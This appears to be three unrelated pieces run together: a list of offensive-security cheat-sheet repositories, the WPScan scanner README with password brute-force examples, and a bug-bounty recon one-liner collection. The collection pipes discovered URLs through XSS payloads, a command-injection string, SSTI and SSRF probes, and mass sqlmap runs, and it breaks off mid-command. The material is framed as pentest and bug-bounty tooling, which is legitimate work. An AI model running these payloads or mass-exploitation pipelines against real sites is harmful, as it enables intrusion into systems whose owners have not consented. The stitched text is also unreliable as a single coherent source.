https://github.com/minimaxir/big-list-of-naughty-strings https://github.com/offport/BlackHatPowershell https://github.com/irblueteam/blue-team https://github.com/gerryguy311/BlueTeamCheatSheet_ChrisDavis https://github.com/sans-blue-team/blue-team-wiki https://github.com/OfWolfAndMan/chsheets (red/blue) https://github.com/cheat/cheatsheets (Everything CLI) https://github.com/chubin/cheat.sh (Everything CLI) https://github.com/0xn3va/cheat-sheets (Application security) https://github.com/OWASP/CheatSheetSeries (OWASP) https://github.com/wsummerhill/CobaltStrike_RedTeam_CheatSheet https://github.com/payloadbox/command-injection-payload-list https://github.com/ihebski/DefaultCreds-cheat-sheet https://github.com/cipher387/Dorks-collections-list https://github.com/chacka0101/exploits https://github.com/akenofu/HackAllTheThings https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet https://github.com/carlospolop/hacktricks https://github.com/JonnyBanana/Huge-Collection-of-CheatSheet https://github.com/tarahmarie/investigations/blob/main/playbook.md (Cyber investigation playbook) https://github.com/irredteam/irredteam.github.io https://github.com/ivan-sincek/ios-penetration-testing-cheat-sheet https://github.com/sinfulz/JustBreakIn https://github.com/sinfulz/JustEvadeBro https://github.com/sinfulz/JustGetDA https://github.com/sinfulz/JustTryHarder https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet https://github.com/InfoSecWarrior/Offensive-Pentesting-Host https://github.com/d4t4s3c/Offensive-Reverse-Shell-Cheat-Sheet https://github.com/0xsyr0/OSCP https://github.com/swisskyrepo/PayloadsAllTheThings https://github.com/l3ickey/pentest-cheat-sheet https://github.com/expl0itabl3/Redsheet https://github.com/0xJs/RedTeaming_CheatSheet https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki https://github.com/chrismaddalena/RedTeamMemory https://github.com/droberson/rtfm https://github.com/danielmiessler/SecLists https://github.com/trustedsec/SysmonCommunityGuide https://github.com/jamesengleback/terminal-adventures https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet https://github.com/trimstray/the-book-of-secret-knowledge https://github.com/riramar/Web-Attack-Cheat-Sheet https://github.com/0x90/wifi-arsenal https://github.com/matthieu-hackwitharts/Win32_Offensive_Cheatsheet https://github.com/morph3/Windows-Red-Team-Cheat-Sheet (This readme is now outdated, using https://notes.morph3.blog) https://github.com/jmau111-org/windows_reg
![alt text](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/wpscan_logo_407x80.png "WPScan - WordPress Security Scanner") [![Build Status](https://travis-ci.org/wpscanteam/wpscan.svg?branch=master)](https://travis-ci.org/wpscanteam/wpscan) [![Code Climate](https://img.shields.io/codeclimate/github/wpscanteam/wpscan.svg)](https://codeclimate.com/github/wpscanteam/wpscan) [![Dependency Status](https://img.shields.io/gemnasium/wpscanteam/wpscan.svg)](https://gemnasium.com/wpscanteam/wpscan) [![Docker Pulls](https://img.shields.io/docker/pulls/wpscanteam/wpscan.svg)](https://hub.docker.com/r/wpscanteam/wpscan/) # LICENSE ## WPScan Public Source License The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2016 WPScan Team. Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. ### 1. Definitions 1.1 "License" means this document. 1.2 "Contributor" means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. 1.3 "WPScan Team" means WPScan’s core developers, an updated list of whom can be found within the CREDITS file. ### 2. Commercialization A commercial use is one intended for commercial advantage or monetary compensation. Example cases of commercialization are: - Using WPScan to provide commercial managed/Software-as-a-Service services. - Distributing WPScan as a commercial product or as part of one. - Using WPScan as a value added service/product. Example cases which do not require a commercial license, and thus fall under the terms set out below, include (but are not limited to): - Penetration testers (or penetration testing organizations) using WPScan as part of their assessment toolkit. - Penetration Testing Linux Distributions including but not limited to Kali Linux, SamuraiWTF, BackBox Linux. - Using WPScan to test your own systems. - Any non-commercial use of WPScan. If you need to purchase a commercial license or are unsure whether you need to purchase a commercial license contact us - team@wpscan.org. We may grant commercial licenses at no monetary cost at our own discretion if the commercial usage is deemed by the WPScan Team to significantly benefit WPScan. Free-use Terms and Conditions; ### 3. Redistribution Redistribution is permitted under the following conditions: - Unmodified License is provided with WPScan. - Unmodified Copyright notices are provided with WPScan. - Does not conflict with the commercialization clause. ### 4. Copying Copying is permitted so long as it does not conflict with the Redistribution clause. ### 5. Modification Modification is permitted so long as it does not conflict with the Redistribution clause. ### 6. Contributions Any Contributions assume the Contributor grants the WPScan Team the unlimited, non-exclusive right to reuse, modify and relicense the Contributor's content. ### 7. Support WPScan is provided under an AS-IS basis and without any support, updates or maintenance. Support, updates and maintenance may be given according to the sole discretion of the WPScan Team. ### 8. Disclaimer of Warranty WPScan is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied, or statutory, including, without limitation, warranties that the WPScan is free of defects, merchantable, fit for a particular purpose or non-infringing. ### 9. Limitation of Liability To the extent permitted under Law, WPScan is provided under an AS-IS basis. The WPScan Team shall never, and without any limit, be liable for any damage, cost, expense or any other payment incurred as a result of WPScan's actions, failure, bugs and/or any other interaction between WPScan and end-equipment, computers, other software or any 3rd party, end-equipment, computer or services. ### 10. Disclaimer Running WPScan against websites without prior mutual consent may be illegal in your country. The WPScan Team accept no liability and are not responsible for any misuse or damage caused by WPScan. ### 11. Trademark The "wpscan" term is a registered trademark. This License does not grant the use of the "wpscan" trademark or the use of the WPScan logo. # INSTALL WPScan comes pre-installed on the following Linux distributions: - [BackBox Linux](http://www.backbox.org/) - [Kali Linux](http://www.kali.org/) - [Pentoo](http://www.pentoo.ch/) - [SamuraiWTF](http://samurai.inguardians.com/) - [BlackArch](http://blackarch.org/) Windows is not supported We suggest you use our official Docker image from https://hub.docker.com/r/wpscanteam/wpscan/ to avoid installation problems. # DOCKER Pull the repo with `docker pull wpscanteam/wpscan` ## Start WPScan ``` docker run -it --rm wpscanteam/wpscan -u https://yourblog.com [options] ``` For the available Options, please see https://github.com/wpscanteam/wpscan#wpscan-arguments If you run the git version of wpscan we included some binstubs in ./bin for easier start of wpscan. ## Examples Mount a local wordlist to the docker container and start a bruteforce attack for user admin ``` docker run -it --rm -v ~/wordlists:/wordlists wpscanteam/wpscan --url https://yourblog.com --wordlist /wordlists/crackstation.txt --username admin ``` (This mounts the host directory `~/wordlists` to the container in the path `/wordlists`) Published on https://hub.docker.com/r/wpscanteam/wpscan/ # Manual install ## Prerequisites - Ruby >= 2.1.9 - Recommended: 2.4.0 - Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault - RubyGems - Recommended: latest - Git ### Installing dependencies on Ubuntu sudo apt-get install libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev ### Installing dependencies on Debian sudo apt-get install gcc git ruby ruby-dev libcurl4-openssl-dev make zlib1g-dev ### Installing dependencies on Fedora sudo dnf install gcc ruby-devel libxml2 libxml2-devel libxslt libxslt-devel libcurl-devel patch rpm-build ### Installing dependencies on Arch Linux pacman -Syu ruby pacman -Syu libyaml ### Installing dependencies on Mac OSX Apple Xcode, Command Line Tools and the libffi are needed (to be able to install the FFI gem), See [http://stackoverflow.com/questions/17775115/cant-setup-ruby-environment-installing-fii-gem-error](http://stackoverflow.com/questions/17775115/cant-setup-ruby-environment-installing-fii-gem-error) ## Installing with RVM (recommended when doing a manual install) If you are using GNOME Terminal, there are some steps required before executing the commands. See here for more information: https://rvm.io/integration/gnome-terminal#integrating-rvm-with-gnome-terminal # Install all prerequisites for your OS (look above) cd ~ curl -sSL https://rvm.io/mpapis.asc | gpg --import - curl -sSL https://get.rvm.io | bash -s stable source ~/.rvm/scripts/rvm echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc rvm install 2.4.0 rvm use 2.4.0 --default echo "gem: --no-ri --no-rdoc" > ~/.gemrc git clone https://github.com/wpscanteam/wpscan.git cd wpscan gem install bundler bundle install --without test ## Installing manually (not recommended) git clone https://github.com/wpscanteam/wpscan.git cd wpscan sudo gem install bundler && bundle install --without test # KNOWN ISSUES - Typhoeus segmentation fault Update cURL to version => 7.21 (may have to install from source) - Proxy not working Update cURL to version => 7.21.7 (may have to install from source). Installation from sources : Grab the sources from http://curl.haxx.se/download.html Decompress the archive Open the folder with the extracted files Run ./configure Run make Run sudo make install Run sudo ldconfig - cannot load such file -- readline: sudo aptitude install libreadline5-dev libncurses5-dev Then, open the directory of the readline gem (you have to locate it) cd ~/.rvm/src/ruby-XXXX/ext/readline ruby extconf.rb make make install See [http://vvv.tobiassjosten.net/ruby-on-rails/fixing-readline-for-the-ruby-on-rails-console/](http://vvv.tobiassjosten.net/ruby-on-rails/fixing-readline-for-the-ruby-on-rails-console/) for more details - no such file to load -- rubygems ```update-alternatives --config ruby``` And select your ruby version See [https://github.com/wpscanteam/wpscan/issues/148](https://github.com/wpscanteam/wpscan/issues/148) # WPSCAN ARGUMENTS --update Update the database to the latest version. --url | -u <target url> The WordPress URL/domain to scan. --force | -f Forces WPScan to not check if the remote site is running WordPress. --enumerate | -e [option(s)] Enumeration. option : u usernames from id 1 to 10 u[10-20] usernames from id 10 to 20 (you must write [] chars) p plugins vp only vulnerable plugins ap all plugins (can take a long time) tt timthumbs t themes vt only vulnerable themes at all themes (can take a long time) Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins If no option is supplied, the default is "vt,tt,u,vp" --exclude-content-based "<regexp or string>" Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied. You do not need to provide the regexp delimiters, but you must write the quotes (simple or double). --config-file | -c <config file> Use the specified config file, see the example.conf.json. --user-agent | -a <User-Agent> Use the specified User-Agent. --cookie <string> String to read cookies from. --random-agent | -r Use a random User-Agent. --follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not --batch Never ask for user input, use the default behaviour. --no-color Do not use colors in the output. --log Creates a log.txt file with WPScan's output. --no-banner Prevents the WPScan banner from being displayed. --disable-accept-header Prevents WPScan sending the Accept HTTP header. --disable-referer Prevents setting the Referer header. --disable-tls-checks Disables SSL/TLS certificate verification. --wp-content-dir <wp content dir> WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specify it. Subdirectories are allowed. --wp-plugins-dir <wp plugins dir> Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed --proxy <[protocol://]host:port> Supply a proxy. HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used. --proxy-auth <username:password> Supply the proxy login credentials. --basic-auth <username:password> Set the HTTP Basic authentication. --wordlist | -w <wordlist> Supply a wordlist for the password brute forcer. If the "-" option is supplied, the wordlist is expected via STDIN. --username | -U <username> Only brute force the supplied username. --usernames <path-to-file> Only brute force the usernames from the file. --cache-dir <cache-directory> Set the cache directory. --cache-ttl <cache-ttl> Typhoeus cache TTL. --request-timeout <request-timeout> Request Timeout. --connect-timeout <connect-timeout> Connect Timeout. --threads | -t <number of threads> The number of threads to use when multi-threading requests. --max-threads <max-threads> Maximum Threads. --throttle <milliseconds> Milliseconds to wait before doing another web request. If used, the --threads should be set to 1. --help | -h This help screen. --verbose | -v Verbose output. --version Output the current version and exit. # WPSCAN EXAMPLES Do 'non-intrusive' checks... ```ruby wpscan.rb --url www.example.com``` Do wordlist password brute force on enumerated users using 50 threads... ```ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50``` Do wordlist password brute force on enumerated users using STDIN as the wordlist... ```crunch 5 13 -f charset.lst mixalpha | ruby wpscan.rb --url www.example.com --wordlist -``` Do wordlist password brute force on the 'admin' username only... ```ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin``` Enumerate installed plugins... ```ruby wpscan.rb --url www.example.com --enumerate p``` Run all enumeration tools... ```ruby wpscan.rb --url www.example.com --enumerate``` Use custom content directory... ```ruby wpscan.rb -u www.example.com --wp-content-dir custom-content``` Update WPScan's databases... ```ruby wpscan.rb --update``` Debug output... ```ruby wpscan.rb --url www.example.com --debug-output 2>debug.log``` # PROJECT HOME [http://www.wpscan.org](http://www.wpscan.org) # VULNERABILITY DATABASE [https://wpvulndb.com](https://wpvulndb.com) # GIT REPOSITORY [https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) # ISSUES [https://github.com/wpscanteam/wpscan/issues](https://github.com/wpscanteam/wpscan/issues) # DEVELOPER DOCUMENTATION [http://rdoc.info/github/wpscanteam/wpscan/frames](http://rdoc.info/github/wpscanteam/wpscan/frames)
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑 ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) <div> <a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a> <a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a> </div> ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) - [@wellpunk](https://twitter.com/wellpunk) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Airixss](https://github.com/ferreiraklet/airixss) - [Axiom](https://github.com/pry0cc/axiom) - [Bhedak](https://github.com/R0X4R/bhedak) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Cariddi](https://github.com/edoardottt/cariddi) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Freq](https://github.com/takshal/freq) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Goop](https://github.com/deletescape/goop) - [GetJS](https://github.com/003random/getJS) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Haklistgen](https://github.com/hakluke/haklistgen) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/ThreatUnkown/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [Knoxss](https://knoxss.me/) - [Katana](https://github.com/projectdiscovery/katana) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [log4j-scan](https://github.com/fullhunt/log4j-scan) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Notify](https://github.com/projectdiscovery/notify) - [Paramspider](https://github.com/devanshbatham/ParamSpider) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [Unfurl](https://github.com/tomnomnom/unfurl) - [Urldedupe](https://github.com/ameenmaali/urldedupe) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [X8](https://github.com/Sh1Yo/x8) - [xray](https://github.com/chaitin/xray) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### BBRF SCOPE DoD ```bash bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' ``` ### Xray Oneliner ```bash xargs -a urls.txt -I@ sh -c './xray webscan --plugins cmd-injection,sqldet,xss --url "@" --html-output vuln.html' ``` ### Katana crawling ```bash subfinder -d hackerone.com -silent -all | httpx -silent | katana -d 5 -silent | grep -iE '\.js'| grep -iEv '(\.jsp|\.json)' subfinder -d hackerone.com -silent -all | httpx -silent | katana -d 5 -silent -em js,jsp,json ``` ### Scan All domains using Knoxss - [Explained command] ```bash echo "dominio" | subfinder -silent | gau | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss.me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIDOKNOXSS\""}' | sh ``` ### Scan All github repo ORG - [Explained command] ```bash docker run --rm mswell/masstrufflehog -o paypal ``` ### Scan log4j using BBRF and log4j-scan - [Explained command](https://bit.ly/3IUivk9) ```bash bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"' ``` ### SSTI in qsreplase add "{{7*7}}" (0xJin) ```bash cat subdomains.txt | httpx -silent -status-code | gau --threads 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ``` ### urldedupe bhedak - [Explained command] ```bash waybackurls testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not' ``` ### Hakrawler Airixss XSS - [Explained command] ```bash echo testphp.vulnweb.com | httpx -silent | hakrawler -subs | grep "=" | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not' ``` ### Airixss XSS - [Explained command] ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" ``` ### FREQ XSS - [Explained command] ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not' ``` ### Bhedak - [Explained command] ```bash cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}" ``` ### .bashrc shortcut OFJAAAH ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Oneliner Haklistgen - @hakluke ```bash subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; ``` ### Running JavaScript on each page send to proxy. - [Explained command] ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Running cariddi to Crawler - [Explained command] ```bash echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive ``` ### Dalfox scan to bugbounty targets. - [Explained command] ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command] ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command] ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command] ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command] ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command] ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command] ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command] ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command] ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command] ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command] ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command] ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command] ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command] ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command] ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command] ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command] ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command] ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command] ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command] ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command] ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command] Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command] ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command] Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command] GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command] GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command] We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command] Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , 